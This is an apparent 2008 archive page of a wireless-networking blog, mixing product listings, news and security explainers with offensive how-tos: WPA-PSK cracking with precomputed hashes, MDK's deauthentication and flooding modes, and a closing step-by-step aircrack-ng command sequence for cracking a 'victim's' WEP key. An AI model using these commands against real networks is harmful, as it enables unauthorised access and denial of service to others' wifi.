Skip to main content

Posts

Showing posts from May, 2008

HD26200, 5-Mile 2.4GHz Outdoor Wireless Bridge Bundle Featuring Two (2) Ubiquiti Networks PowerStation2 dual polarity 2.4 GHz radios

HD26200 5-Mile 2.4GHz Outdoor Wireless Bridge Bundle Featuring Two (2) Ubiquiti Networks PowerStation2 dual polarity 2.4 GHz radios with POE adapters included. No Need for RF cables as the radios sit outside and connect using outdoor Cat5 cable. Ubiquiti Networks PowerStation2 Bridge The Highest Performing 2.4GHz Bridge for the money. Featuring Adaptive Antenna Polarity (AAP) Dual Polarity Technology from ubnt -ubiquiti Twin 17dbi dual polarization version PowerStations the HD26200 wireless bridge offers a versatile open architecture 802.11 based outdoor wireless platform that can be used as PTP, Bridge, or a PMP bridge by adding an additional HD26158 for just an additional $159 connect three locations for under $480. It features exceptional radio and antenna design which allows links to be established over distances of 50km (30 miles*) and can provide significantly increased throughput (up to 50+Mbps TCP/IP) over other solutions in comparable environments. Additionally, Ubiquiti has m

HD26200 bridge WiFi Netowrk upto five miles

HD Communications Corp has introduced a wireless network extender system that allows users to bridge a WiFi up to five miles. The $318 HD26200 system, which requires direct line of sight, is a complete outdoor wireless network bridge in the 802.11 b/g 2.4GHz band that uses two high performance Ubiquiti network radios with integrated 17dbi dual polarity antennas. The HD26200 bridge is powered over ethernet, allowing a single outdoor CAT5 cable to bring both data and power to the radios. "Since the introduction of WiFi radios people have tried to push the range of consumer level products by adding external antennas, RF cables, and WiFi amplifiers. The cost of those devices often totaled well over $500 and that was after they had already bought two D-Link or Linksys radios for $75 each," said Don Davis, President and CEO of HD Communications Corp. "Now they can have an FCC certified wireless bridge that will work better, look better, is easier to configure, and easier to in

Cracking WPA-PSK secured Wireless Networks

WiFi Hacking part - WPA-PSK cracking. The text about cracking WPA coding is an alternative to the classic process (dictionary atack - cracking WPA key with Aircrack-ng and wordlist). I have used Cowpatty, John the Ripper and genPMK. Additionaly to the pentest you can get hash at Lostboxen (6GB) or at Shmoo (35GB) and wordlist for generating your own control sums.. After dowloading and decompressing the hashe (having a weaker processor might take a while :) are available by random browser of system files. You can use the way to the file in the folder where it is saved or it can be copied to the place where you are going to test it. When using this technique PSK crack is not a dictionary atack but a comparison of control sums. I am mentioning the dictionary it self because of two reasons. The possibility of a dictionary atack exists all the time and somebody still enjoys the classic way :) The other more interesting possibility is to generate your own hashe by the tool genPMK. After the

Destruction Mode with Charon 2 GUI

Last year we told about not so well know tool called MDK, as part of the "Cracking WEP key - Acces Point with pree-shared key (PSK" concept. Alot of time has passed by since then and now we have well workiong stable version even with GUI extension Charon. It was not much of a deal in Fall 2007, but the situation has changed. The autor has also decidedd to eneble the Destruction Mode in the menu. The extension is written in Java and is very stable. If you have not encountered the MDK tool before, it is a proof-of-concept tool from the authors of the PTW implementation in aircrack-ng (Darmstadt Lab). It tses 8 concepts of attacking wireless networks. b - Beacon Flood Mode sends beacon frames and confuses the client by creating fake APs. This is able to make AP scanning applications and devices unusable a - Authentication DoS mode sends auth frames to all APs in range. This results in freezinig or restarting devices p - Basic probing a ESSID Bruteforce mode sends probe requests

AiroWizard 1.0 Beta revision 250

later update for AiroWizard 1.0 Beta revision 250 post: AiroWizard the WEP key recovering utility for Windows This project has been (most probably) discontinued at the request of TamoSoft Ltd., in the name of TamoSoft Ltd. and/or Atheros Communications. TamoSoft Ltd. forbids usage of their drivers outside of their applications, so... Now go and use CommView for WiFi for all your WEP recovering needs. Exclusively. Just leave it running for a couple of hours/days/weeks, and maybe you will be able to recover 64-bit WEP key. Oh yes, and don't forget to use Atheros chipset based wireless adapters. Exclusively, too. .............................. AiroWizard 1.0 Beta revision 250 will no longer be available for download on this website.

AiroWizard 1.0 Beta revision 250

Tutorial Videos on how to use AiroWizard 1.0 Beta revision 250: Driver installation Failed driver installation AiroWizard's features and Fragmentation attack, Part1 AiroWizard's features and Fragmentation attack, Part2 download AiroWizard 1.0 Beta revision 250 You will need to download the Adapter Test Utility , a compatible adapter may show up under the generic name, "Atheros Wireless Network Adapter". If a compatible adapter has been detected, you can install CommView for WiFi.

WiFi Antenna pigtail and connectors

A pigtail, is a short cable needed to connect the DIY antenna to a laptop or desktop wireless card and/or access point. A pigtail (sometimes called a laptop adapter cable) is a short length of microwave-friendly coaxial cable with connectors on both ends. It needs to be short because coaxial cable is very lossy at microwave frequencies, and the loss is proportional to the length of the cable.You can make you own (see below), but unless you have experience soldering small connectors to coax, spend you money on a ready-made pigtail. Since the DIY antenna uses a standard N-Female connector, the antenna end of the pigtail will need to be a standard N-Male connector. Look for quality N connectors, low loss silver-plated with gold contacts, not the cheaper silver contacts. If necessary, you can add a PCMCIA or USB adapter to your laptop that will accept the other end of the pigtail. Look for cards/adapters with external antenna connections! Type N connector (photo) is a threaded RF connector

Interline BabuYAGA 14dBi

BabuYAGA is a YAGI type directional antenna working well with all 2.4GHz wireless devices. Antenna's radiator is a precise designed printed circuit board element. Machine stamped directory element responsible for beam formatting gives excellent radiating characteristic. Antenna works at 14dBi gain what extends the range up to 4 times comparing to built-in or standard 1/4 wave antennas of wireless devices., 0.5 m H 155 / Nmale connector. Key features: - classic design in modern approach - very durable mounting - casing protects radiating elements from the wind, rain, snow and ice - high quality materials assure long-life operation - various cable length and connector type versions available Recommended as: - subscriber antenna with a range up to 1500* meters *average range to 9dBi base station, e.g. HORIZON midi 2.4GHz/9dBi - point to point links for up to 2500* meters range *two BabuYAGA 2.4GHz/14dBi antennas Electrical: Gain......................................14 dBi Frequency...

Interline Panel 14

PANEL 14 is a directional, subscriber antenna working well with all 2.4GHz wireless devices. It can be used in indoor and outdoor applications. Antenna's radiator is a precise designed printed circuit board element. Module design assures perfect fitting what guarantee reliable performance in all weather conditions and constant high production quality. Antenna works at 14dBi gain what extends the range up to 4 times comparing to built-in or standard 1/4 wave antennas of wireless devices, Nfemale connector. Key features: - durable mounting with tilting option - ABS casing protects radiating elements from the wind, rain, snow and ice - very thin and discreet - thickness: 20mm Recommended as: - subscriber antenna with a range up to 1500* meters *average range to 9dBi base station, e.g. HORIZON midi 2.4GHz/9dBi - point to point links for up to 2500* meters range *two PANEL 14 2.4GHz/14dBi antennas small hotspot antenna, also with sectorized coverage Electrical: Gain.....................

Super Cantenna

Extend the range of your wireless network, or connect to other wireless networks in your neighborhood. Just connect the antenna to your wireless router, access point or network card, then point and shoot. (See below for list of compatible wireless devices.) Package includes: 12 dBi Super Cantenna Booster Antenna Integrated 36-inch RF cable with RPSMA connector RPTNC adapter Dual tripod/pistol grip Features: Works with most wireless devices Directional 2.4 Ghz Wireless Network Booster Antenna Compatible with 802.11b and 802.11g wireless networks Use it with your wireless router, access point, or client card Universal mounting socket: fits standard camera tripods or other mounting hardware such as outdoor speaker mounts. Weather-resistant coating - new black color

TurboTenna

The TurboTenna discussed below appears to be a copy of a more or less identical product from Cantenna. Following on from my last posting a friend just pointed out the TurboTenna, a simple and nicely engineered antenna on a tripod with a 12+ dBi gain for only $19.95! The vendor, danets (otherwise known as DataCom Network Ltd.), also provides a useful though brief primer on antennas. If you get one of these TurboTennas let me know what you think of it.

Receive Sensitivity for WiFi hardware

Receive Sensitivity is how much signal a card needs to receive in order to work at that speed level. A 3 dB difference is double the power. You can now see some cards are getting much better distances. The difference between a Cisco 350 and a Addtron at 1 Mbps is 32x times the sensitivity. This means that the Cisco needs 1/32 as much signal strength as the Addtron does to work at the same rate. Also, a lower receive sensitivity number is better (IE: -95 is better than -80). Receive sensitivity is measured in dBm @BER 10E-5 or (or 8% FER). Note: IEEE 802.11 15.4.8.1 says that "F" in 8% FER for DSSS devices stands for an MPDU having 1024 octets. 8/100 (errors/frames) / (1024 (octets) * 8 (bits) = approx. 1/100,000 errors/bits = 10-5 BER. i.e. 8% FER should be comparable to 10-5 BER. CLICK

AirMagnet

Enterprises can now deploy wireless LANs (WLAN) with the same confidence they do with wired networks, thanks to AirMagnet's suite of wireless network assurance solutions. With AirMagnet solutions you have complete control over the entire lifecycle of the wireless LAN (WLAN) from network design and deployment all the way to 24x7 intrusion prevention and troubleshooting. AirMagnet provides unrivaled visibility into all aspects of your wireless airspace with the intelligence to automatically diagnose, explain and respond to any wireless challenge 24x7 WLAN IDS/IPS and Management AirMagnet Enterprise 24/7 WLAN Security and Performance Monitoring Continuous monitoring and protection of all your wireless assets worldwide. AirMagnet Enterprise provides the most sophisticated WLAN solution to detect and defend against hundreds of wireless threats, trace and investigate devices, remotely troubleshoot performance problems and enforce and document compliance with internal and external polici

Airscanner Mobile Sniffer 2.0

Requirements: Windows Mobile device running Windows Mobile 2003SE, Windows Mobile 2005 or above with built-in WiFi. Overview: Are you tired of dragging your laptop all over campus to audit your WLAN? Simply slip Airscanner Mobile Sniffer into your pocket, and you are ready to go. Airscanner Mobile Sniffer packs the power of a full-scale sniffer into an application for portable devices. Sniff passwords from your Pocket PC As a network administrator, you want to protect your users' confidential data. What better way to do this than to stroll down the hall with Airscanner Mobile Sniffer hidden in your pocket? Thanks to our support for Ethereal packet capture format, grabbing your user's passwords out of the airwaves is as easy as watching a movie! Your users unintentionally send their passwords through the air in clear text, so it is better that you discover this first before a malicious drive-by hacker does it for you. Airscanner Mobile Sniffer also works in promiscuous mode, so

Nokia E66 and E71

Nokia fans, S60 fans, Symbian fans of all types, your attention, please! Allow us to set your hearts a-flutter with a few pictures of Nokia's latest two all-business smartphones, the rumored E66 and E71. Both models are pictured here out and about, doing what they do best -- a promising indication that we might be due for an official announcement in the not-too-distant future. We're told that both have 3.2 megapixel cameras (as expected), 128MB of memory, and as we've suspected from the few photos we've seen before, they're "sleek and sexy" in the flesh. Nokia's manufacturing processes appear to be continuing to improve, too, because we're told that the E66 feels "rugged and solid" despite the slide mechanism -- a sore spot with many an N95 owner.

Nokia E66 finds its way into the FCC

One of Nokia's upcoming business-class handsets, the svelte E66 slider, has garnered FCC approval ahead of a launch that we've got to believe is happening in the very near future now. That's the good news; the bad news is that there's zero North American 3G involved from what we can see in the test reports. That would make this one a tough sell for existing E65 customers in the States, we think, especially considering that prerelease units haven't been seen sporting Feature Pack 2. Ah well -- the E67, perhaps, Nokia? Turns out there's another E66 lurking in the FCC's midst that trades HSDPA 2100 for 850 / 1900

Alfa awus046n IEEE 802.11n

USB device http://dplanet.biz/alfa.com/product_info.php?cPath=159_177&products_id=403 Standards IEEE 802.11n draft, IEEE 802.11b, IEEE 802.11g Receiver Sensitivity 11Mbps -90dBm / 54Mbps -78dBm / 300Mbps -70dBm Output power 16 – 18 dbm (typical) Range Coverage Indoor 30~50meters This is a pretty cheap toy, about 40 euro shipping included for EU. It's not fully supported on linux yet, but as you can see from the rt2x00 Project, the aim is to have also packet injection working from a vanilla kernel. Range coverage most likely is while using 802.11n.

SR71 USB

SR71 USB 802.11a/b/g/n MIMO USB module External Antenna Connectors Atheros AR9160 with DFS SUPPORT IEEE 802.11a/b/g/n USB 2.0 5VDC (2) MMCX for 2x2 MIMO Operation -20C to +70C (extended temp version up to +95C) 802.11i with AES-CCM & TKIP Encryption, 802.1x, 64/128/152bit WEP up to 300Mbps 20MHz / 40MHz YES 2412-2462MHz(FCC) , 5475-5725MHz (CE), 5745-5825MHz (FCC) 24dBm, +/-2dB 1.25A, +/-100mA YES over 150m over 50km Linux Perfect for Aircrack-ng

Linux May Power New Nokia Phones

The world's top handset maker Nokia Oyj expects the role of the Linux operating system in its product portfolio to increase as the role of its Internet-focused devices grows, company officials said. Linux has so far had little success on cellphones, but its role is increasing as more new Linux-based models reach the market, while Google Inc gave it a vote of confidence by using it to build its Android platform on. Nokia itself has used Linux for years in its Internet tablets, large phone-like devices used to access Internet on the go, but lacking calling functionality. "We will expand that range, and we believe that the role of Linux will grow," said Nokia spokesman Kari Tuutti. Linux is the most popular type of open source operating system which is available to the public to be used, revised and shared -- meaning it has a large developer community which could result in more attractive programs and lower costs for the likes of Nokia. Nokia has used the tablets to target t

Debunking myths in wireless security

You're likely to get some bad wireless security advice from the guy at your local electronics superstore who sold you your router, because many of the commonly recommended wireless security tips floating around out there aren't actually all that useful and may even do more harm than good by lulling the end-user into a false sense of security. Hiding the SSID The SSID (Service Set Identifier) is an identification code (typically a simple name) broadcast by a wireless router. If a wireless device detects multiple SSIDs from multiple access points (APs), it will typically ask the end-user which one it should connect to. Telling a router not to broadcast its SSID may prevent basic wireless access software from displaying the network in question as a connection option, but it does nothing to actually secure the network. Any time a user connects to a router, the SSID is broadcast in plaintext, regardless of whether or not encryption is enabled. SSID information can also be picked up

Enabling a wireless security standard

Actually enabling a security standard (assuming you don't already run one) is simple. I'll provide a few sample screenshots from a Linksys WRT150 router (802.11n Draft 2.0 compliant); the procedure should be similar on any other product. Drop into the "Wireless Security" of the WRT150 and open the selection tab, and this is what you see: We're going to ignore WEP, since you really shouldn't be using it, and focus on the various WPA options. WPA Personal (aka, WPA-PSK) and WPA2-Personal are configured more-or-less identically. Select the option, choose your encryption method (TKIP or AES), and enter your chosen encryption key. There should be no need to change the default key renewal time (3,600 seconds) but if you need to do so, you can do that, as well. From this point, all you need to do is configure your various wireless adapters with the same information, and you should be up and running. Linksys' options for switching to RADIUS mode are a bit misl

WPA and WPA2

WPA was developed in response to the flaws in WEP, and it's a much better security protocol than its predecessor. Unlike WEP, WPA uses a 48-bit initialization vector and a 128-bit encryption key. More importantly, however, WPA uses what's called the Temporary Key Integrity Protocol (TKIP). Whereas WEP recycles the same key for encrypting all the packets flowing across the network, WPA's TKIP changes the encryption key every single time a packet is transmitted. This, combined with the use of longer keys, prevents a hacker from compromising a router simply by passively observing a large enough set of packet transmissions. The WPA2 standard is a 2004 update to the WPA specification that includes support for a US government-approved encryption protocol called Advanced Encryption Standard (AES). (AES can also now be used with WPA, though the presence of this option will probably depend on how recently your router received a firmware update.) Unlike WPA, WPA2 was not explicitly d

WEP: Old, busted, and better than nothing

Wired Equivalent Privacy (WEP) was the first wireless security protocol. Originally, WEP used a 40-bit encryption key, but this was later extended to 104 bits due to concerns over the security of the WEP standard. This change, however, was little more than a stop-gap measure, meant to make WEP less susceptible to brute-force attacks. WEP used a 24-bit initialization vector (IV) when encrypting both 40-bit and 104-bit ciphers. This 24-bit IV is vulnerable to cracking due to the low number of possible permutations (16,777,216 for those of you keeping count). Just last year, researchers succeeded in cracking 104-bit WEP encryption in about two minutes using an old Pentium-M machine. Unfortunately, WEP's flaws have yet to drive it from the market. As recently as last November, surveys showed that up to 25 percent of WAP hotspots were still using WEP, and the largest data theft in US history is thought to have been caused by the use of WEP encryption. Now that even WEP's 104-bit enc

Secure Your Home Wi-Fi Network

Tech site Ars Technica runs down the basics of securing your home wireless network with the most secure and up-to-date methods. The main takeaway is that when you enable encryption on your wireless router, use WPA encryption instead of WEP, because it's better and stronger. Unlike WEP, WPA uses a 48-bit initialization vector and a 128-bit encryption key. More importantly, however, WPA uses what's called the Temporary Key Integrity Protocol (TKIP). Whereas WEP recycles the same key for encrypting all the packets flowing across the network, WPA's TKIP changes the encryption key every single time a packet is transmitted. This, combined with the use of longer keys, prevents a hacker from compromising a router simply by passively observing a large enough set of packet transmissions. Ars lists common home network hardware—from an Xbox 360 to a Wii to an iPhone—and the various protocols they support. Luckily, most do speak WPA. Here's our full guide to setting up a home wirele

Keep Your Wi-Fi Strong

The Web Worker Daily weblog suggests several methods to keep your router performing and your wireless internet strong. The post offers several tips for how to improve your wireless network, from performing a cycled reboot when things aren't working correctly to adding access points to boost your signal to every corner of your home. Honestly, after having turned my router into a super-router with both DD-WRT and Tomato, I've never enjoyed more stability and performance from a router. I can't remember the last time I had to do a cycled reboot, and the Wi-Fi signal boosting doesn't hurt, either. Routers running Tomato/DD-WRT also work as wireless bridges for extending your base signal, and they're a cheap way to do it. Let's hear how you keep your home network churning day in and out in the comments. Regular Checkups to Keep Your Wi-Fi Signal Spiffy [Web Worker Daily]

Locate Free Wireless with Wi-Fi Hotspot Finder

The Wi-Fi Hotspot Finder webapp displays free wireless internet hotspots in your area on a Google Maps mashup. To use it, just give it your address, city, or zip and it'll display many of the nearby hotspots. This sort of tool isn't new by any means, but it is returning better results in my area than previously mentioned webapps like Hotspotr. If you give it a try, let's hear how the hotspot finder measures up in your area in the comments. While you're there, you may want to download wiPod, which stores all that hotspot information in note form for easy browsing on your iPod. Free Wi-Fi/Hotspot Finder [AnchorFree via FreewareGenius]

Turn Your Windows Mobile Phone into a Wi-Fi Router with WMWifiRouter

Turn your Windows Mobile phone into a Wi-Fi router, providing any Wi-Fi-capable device access to your cell plan's data network, with freeware application WMWifiRouter. Install WMWifiRouter to your phone, run the application, and it automatically sets up an ad-hoc Wi-Fi network named WMWifiRouter that you can connect your laptop—or any other wireless device—to without going through the regular pain involved in tethering an internet connection to your mobile device. My WM phone is out of the house today so I couldn't try it out, so if you do let us know how it worked in the comments. The brilliant WMWifiRouter is freeware, still under heavy development, Windows Mobile 6 only. WMWifiRouter [via Hackszine]

Reveal Wi-Fi Network Passwords with WirelessKeyView

Windows only: By default Windows hides WEP and WPA keys stored on your PC to connect to various Wi-Fi networks, but freeware utility WirelessKeyView lists them for you. When you've forgotten that Wi-Fi network key, run WirelessKeyView to see all the networks your Windows PC has ever connected to using its default Wireless Zero Configuration mechanism. (This utility doesn't reveal keys stored by third-party network connection software.) Delete keys from old networks that you no longer need, and easily copy keys to the clipboard to send or save. WirelessKeyView is a free download for Windows XP and Vista.

DD-WRT for Ubiquiti devices

With DD-WRT v24 rapidly nearing completion we are proud to present support for all Ubiquiti devices (LS2, LS5, NS2, NS5, PS2, PS5) for the latest release candidate RC7. The associated firmware versions are part of the line of DD-WRT firmwares for professional use. Ubiquiti offers affordable yet powerful devices based on Atheros wireless technology and allows high performance long range Wireless LAN connections, especially when driven by DD-WRT. The upcoming DD-WRT v24 will also support channel mapping for Ubiquiti XR7, SR9, XR9, XR3 and XR4. And of course all other Ubiquiti WLAN cards (SR2, XR2, SR5, XR5, SRC) are also supported with showing the right txpower.

DD-WRT v24 released

DD-WRT v24 offers many new features, on of the most important is support of Atheros wlan chipsets and SOC designs. By supporting special features of the Atheros wireless designs like half- and quarter channels and extended channel support DD-WRT is now perfectly suited for long range wireless links. With this DD-WRT is now also supporting the whole Ubiquity line of wireless products using all available features the hardware offers. Highlights of DD-WRT v24: - Virtual SSIDs, Virtual DHCP-Servers, PPTP over WAN enhencements, Bridging + VLAN support, VDSL Support, OLSR-Routing / Freifunk, My Ad Network (powered by AnchorFree), Quaqqa instead of Bird (in X86 + Xscale default), PPPOE-Server, EOIP-Tunnel, Network configuration enhencements, UP-Downstream (QOS), New Packet Scheduler HFSC, Save & Apply, extended DDNS options, extended status information, New Languages, Sipwerk integrated Milkfish into the new release, turning every DD-WRT router into a SIP-aware firewall. New hardware pla

Sonic Impact 5026 Wireless FM Music Adapter

Sonic Impact 5026 Wireless FM Music Adapter Tech-Spec: Wirelessly sends the audio from personal audio devices - MP3 players, - portable CD players, - portable jukeboxes to car stereo. Easy to use - just plug in, select FM bandwidth, tune in to stereo & play Link portable music devices to car or home stereo without cable or wires Full stereo sound No wires or cassette adapters Gives the flexibility to bring audio programming into car Ideal for portable MP3, CD & tape players Requires 2AAA batteries (batteries not included)

Inquiry into Tory e-mail blunder

The Information Commissioner is launching an investigation after the Conservatives accidentally sent details of 8,000 people to a radio station. The e-mail sent contained the names, addresses, telephone numbers and intentions of voters in the Crewe and Nantwich by-election. Deputy Information Commissioner David Smith said the disclosure, to Manx Radio, raised "serious concern". The Conservatives admitted a "mistake" had been made. Files deleted The information, which had been gathered by the Tories during the campaign for Thursday's by-election, was contained in three Excel files, and was sent in an e-mail to Manx Radio by accident, potentially breaching data protection laws. The e-mail was received by the radio station at lunchtime on Wednesday. It sent it on to the local newspaper in Crewe, although it is understood that both emails have now been deleted. via BBC NEWS

BT-407 Bluetooth Headset

The Generic BT-407 Bluetooth Headset Warranty: 90 Day Woot Limited Warranty Features: Bluetooth compliance: Bluetooth version 2.0 specifications Bluetooth profiles: Bluetooth headset and hands-free profiles Operating range: Up to 10 metres (30 feet) Talk time: Up to 8h (subject to phone) Stand-by time: Up to 170h Charging time: Approximately 2 hours Reverseable earhook Battery type: Rechargeable lithium polymer. Pairing passkey or PIN: 0000 Supported special features: Answer/end call Reject call Call hold/Call wait Dedicated volume control In the box: 2 BT-407 Bluetooth Headset 2 Power Adapter 2 User Guide

Gigabyte Desktop Wireless Router

Gigabyte has just releases world's first PCI desktop wireless routerIt is a card that you insert in your PC and transforms it into a wireless router, allowing you to share your broadband internet connection with other computers. You plug in your internet connection on it and all computers with wireless card on your home or office will hve internet connection. Also, it has a standard RJ45 port for you to connect it to a hub or switch (or even just anothe computer), allowing you to connect several computers to it using standard network cabling. Known as AirCruiser G or GN-BC01, here are its main features: Interoperability with 54Mbps (802.11g) and 11Mbps (802.11b) devices Single 10/100Mbps Ethernet LAN port Full static & dynamic routing Built-in DHCP server 64/128-bit WEP encryption, 802.1x and WPA security UPnP (Universal Plug and Play) Dynamic DNS, URL blocking and VPN pass-through support WDS bridging Comes with a 3 dBi antenna (usually wireless routers use a less powerfull 2

HomeCamera Turns Your Webcam into a Surveillance Camera

Windows only: Web site and software HomeCamera turns your desktop webcam into a web-enabled surveillance camera. Just sign up and download their desktop software to get started. In just a few minutes, you can check an image or video from your webcam in real-time from any browser. Even better, you can set up motion-detecting alerts that will email you with a shot or short clip of what triggered the alert. The Windows-only HomeCamera is completely free during their beta and will remain free with limitations once they leave beta.

JoikuSpot Light v2.0 Final

JoikuSpot goes out of Beta! Production release JoikuSpot Light 2.00 is here . JoikuSpot is FREE and SECURE Mobile HotSpot solution that turns Nokia phones to a WLAN HotSpot. JoikuSpot software is installed directly to the phone. When switched on, laptops and iPods can establish instant, secure and fast WLAN connection via smartphone's JoikuSpot HotSpot using phone's own 3G internet connection. Multiple devices can connect to JoikuSpot in parallel and seamlessly share the same 3G internet connection. You can use JoikuSpot to access internet e.g. on the train, car, sailing boat, summer cottage, hotel, while walking, or when at remote office...where ever you are! Release notes for JoikuSpot Light: -Landing page works with all operators -Encryption support with WEP including 128bit key generator -Battery threshold shutting down the client when battery level is too low -Default Access point setting -Support for secure SSH tunnels with Putty -GPS location with Google Maps integration

Aircrack-ng VMware appliance

A new version of the VMware appliance is released (drivers and aircrack-ng updated and added rt73 driver). Requirements VMWare Workstation 6.02, VMWare Player 2.02 (freeware) or VMWare Fusion beta for intel based Mac's Wireless USB adapter with either rtl8187, rt2570 or rt73 chipset Approximately 2 gigs of hard disk space Starting Install VMWare Workstation or Player Download this VMware image here and unpack it somewhere (on a NTFS file system) Start VMware and select “open”. Open the virtual machine. Attach your USB adapter. If the USB adapter is recognized automatically you'll find a small USB icon in the lower right corner of your VMWare window. If not you have to activate it manually. Notes: You don't need a driver for the device on the OS running VMware. The login credentials for the image are user id “root” with password “root”. On some versions the password is “toor”. The FAQ has some limited information about running the aircrack-ng suite under VMWare.

Hotspotter - Automatic wireless client penetration

Hotspotter passively monitors the network for probe request frames to identify the preferred networks of Windows XP clients, and will compare it to a supplied list of common hotspot network names. If the probed network name matches a common hotspot name, Hotspotter will act as an access point to allow the client to authenticate and associate. Once associated, Hotspotter can be configured to run a command, possibly a script to kick off a DHCP daemon and other scanning against the new victim.

SEAT

SEAT (Search Engine Assessment Tool) is the next generation information digging application geared toward the needs of security professionals. SEAT uses information stored in search engine databases, cache repositories, and other public resources to scan a site for potential vulnerabilities. It’s multi-threaded, multi-database, and multi-search-engine capabilities permit easy navigation through vast amounts of information with a goal of system security assessment. Furthermore, SEAT’s ability to easily process additional search engine signatures as well as custom made vulnerability databases allows security professionals to adapt SEAT to their specific needs. Features Supported Search Engines: o Google o Yahoo o MSN o A9 o AltaVista o AllTheWeb o AOL o DMOZ Vulnerability Databases: o GHDB o NIKTO o GSDB o WMAP o URLCHK o NESTEA Advanced Features: o Mine domain names belonging to a target site o Indirectly scan a range of IP addresses o Quickly create new custom Search Engine signatures

wicrawl

Wicrawl is a simple wi-fi (802.11x) Access Point auditor with a simple and flexible plugin architecture. The plugins allow us to find out useful information about an AP so we don’t have to manually check each access point. Plugins are implemented for existing common tools, and new plugins can be written in any language. Wicrawl is able to use multiple cards, and eventually will be able to use multiple computers. The goal is to automate the tedious task of scanning wi-fi access points for interesting information. This can be a useful tool for penetration testers looking to “crawl” through massive numbers of APs looking for interesting data. Plugins will be everything from DHCP and nmap to aircrack or hooks to move a motorized directional antenna around. Major features: o Passive detection of Access Points (This means that if there are clients, we can find out the SSIDs from APs that have broadcast turned off). o Support for multiple cards. Discovery can be run from one card, while the p

Open Research

Busting The Bluetooth Myth Author(s): Max Moser Topic: During the last year, rumours had come to my attention that apparently it is possible to transform a standard 30USD Bluetooth® dongle into a full-blown Bluetooth® sniffer. Thinking you absolutely need Hardware to be able to hop 79 channels 1600 times a second I was rather suspicious about these claims. This paper is the result of my research into this area, answering the question whether it is possible or not. How to Grab Ressources - a Practical Guide Author(s): Andreas Naepflin Topic: This is a small tutorial about Reverse Engineering. This tutorial explains how to manually unpack a UPX-packed executable and manually extract a resource out of it. Phun with Fortiguard Filters Author(s): Satya Jith Topic: Funny issue with Fortiguard Filters and HTTPs OpenWRT Madness Author(s): Mati Aharoni Topic: Getting Metasploit to run on a Linksys Router Netgear WG511 External Antenna Modification Author(s): Paul Mansbridge Topic: Adding an ant

HTC Touch Diamond

3G Network HSDPA 2100 / 900 for Europe/Asia HSDPA 850 / 1900 for Americas Display Type TFT touchscreen, 65K colors Size 480 x 640 pixels, 2.8 inches - TouchFLO 3D finger swipe navigation - Accelerometer sensor for auto-rotate - Touch-sensitive navigation control - Handwriting recognition - 4 GB user available memory - 192 MB DDR SDRAM, 256 MB ROM - Qualcomm MSM7201A 528 Mhz processor EDGE Class 10, 236.8 kbps 3G HSDPA, 7.2 Mbps WLAN Wi-Fi 802.11 b/g Bluetooth Yes, v2.0 with A2DP Features OS Microsoft Windows Mobile 6.1 Professional Messaging SMS, MMS, Email, Instant Messaging Browser WAP 2.0/xHTML, HTML Games Yes Colors Black Camera 3.15 MP, 2048x1536 pixels, autofocus, video; secondary VGA videocall camera - Built-in GPS with A-GPS - Stereo FM radio with RDS - Pocket Office(Word, Excel, Outlook, PDF viewer) - Java MIDP 2.0 - Voice memo - MP3 player - Built-in handsfree Battery Standard battery, Li-Ion 900 mAh

AiroWizard

The AiroWizard is an WEP-recovering application, based on Aircrack-ng suite. It uses Airserv-ng via commview.dll to, put your card to "monitor mode".Then, Airodump-ng to find the desired wireless Access Point and collect data, Aireplay-ng to perform fake authentication and packet replay\injection, and finally, Aircrack-ng to recover (crack if you will..) a WEP key, needed to connect to a wireless Access Point. So, the AiroWizard is, as you can see, nothing more than just a .NET wrapper for Aircrack-ng suite. If you want a real deal, use BackTrack2 :) To use the AiroWizard, you have to read this and agree: 1.)It is an imperative that you have some basic networking knowledge, and that you know what you're doing, because using this software for illegal activities may get you to jail (which i strongly discourage for obvious reasons, and of course assume no resposibility if it happens.) 2.)Note that in some countries you're not allowed even to install this type of software

Wi-Fi Site Survey Suites

AirDefense Survey AirMagnet Survey/Planner AirTight Networks SpectraGuard Planner BVS Hive Cisco Wireless Control System Ekahau Wireless Site Survey Fluke Networks InterpretAir WLAN Survey Helium Networks Wireless Recon Motorla LAN Planner Psiber RF3D WifiPlanner Trapeze Networks RingMaster VisiWave Site Survey

Wi-Fi Intrusion Detection and Prevention Systems

AirDefense Enterprise AirMagnet Enterprise AirPatrol WiVision AirTight Networks SpectraGuard Enterprise Aruba Networks RFprotect Distributed Colubris Networks RFManager Cisco Wireless Control System ManageEngine WiFi Manager Motorola Wireless IPS Newbury Networks WiFi Watchdog Siemens HiPath Wireless Manager HiGuard Verisign Wireless IPS Service VigilantMinds AirXone WIDZ

Wi-Fi Traffic Analyzers

AirDefense Mobile AirMagnet Laptop and Handheld Analyzers BVS YellowJacket-BAG BSD-AirTools Aruba Networks RFprotect Mobile Cambridge vxSniffer Fluke Networks OptiView and EtherScope Javvin Network Packet Analyzer Kismet Paglo Packetyzer NetScout Sniffer Portable Network Instruments Network Observer TamoSoft CommView for Wi-Fi WildPackets OmniPeek WireShark (formerly Ethereal)

Monitor Wi-Fi - Monitoring and Alerts

Wifi-Owl™ monitors your APs 24/7 and knows how to spot problems using it's knowledge-base of rules. When it finds problems it will immediately alert you. The rules cover most problem conditions that are likely to occur. You can use the rules as is, modify them, or create new ones to monitor specific issues in your environment. You will know exactly when to add new Access Points, change locations or replace them.

10 Easy Steps to Crack a Wireless WEP Key128 bit using Ubuntu

the Commands 1)sudo airmon-ng start wifi0 (start ur wifi card to monitor mode) 2)sudo wlanconfig ath0 destroy 3)sudo ifconfig ath1 up (makes ur ath1 interface up) 4)sudo iwconfig ath1 mode monitor channel 11 (makes ath1 to set in monitor mode in channel 11) 5)sudo aireplay-ng -1 0 -e linksys -a victims MAC address -h your MAC address ath1 ( Sending Authentication Request) 6)sudo aireplay-ng -5 -b victims MAC address -h your MAC address ath1 (fragmentation attack) 7)packetforge-ng -0 -a victims MAC address -h your MAC address -k 255.255.255.255 -l 255.255.255.255 -y ur xor file.xor -w arp-request (generate an arp packet) 8)sudo airodump-ng -c 11 –bssid victims MAC address -w capture ath1 (monitors the AP) 9)sudo aireplay-ng -2 -r arp-request ath1 (sending the Arp-request with use interactive frame selection) 10)sudo aircrack-ng -z *.cap (capture*.cap selects all dump files starting with “capture” and ending in “cap”.) “-z ptw attack

About WPA and WPA2

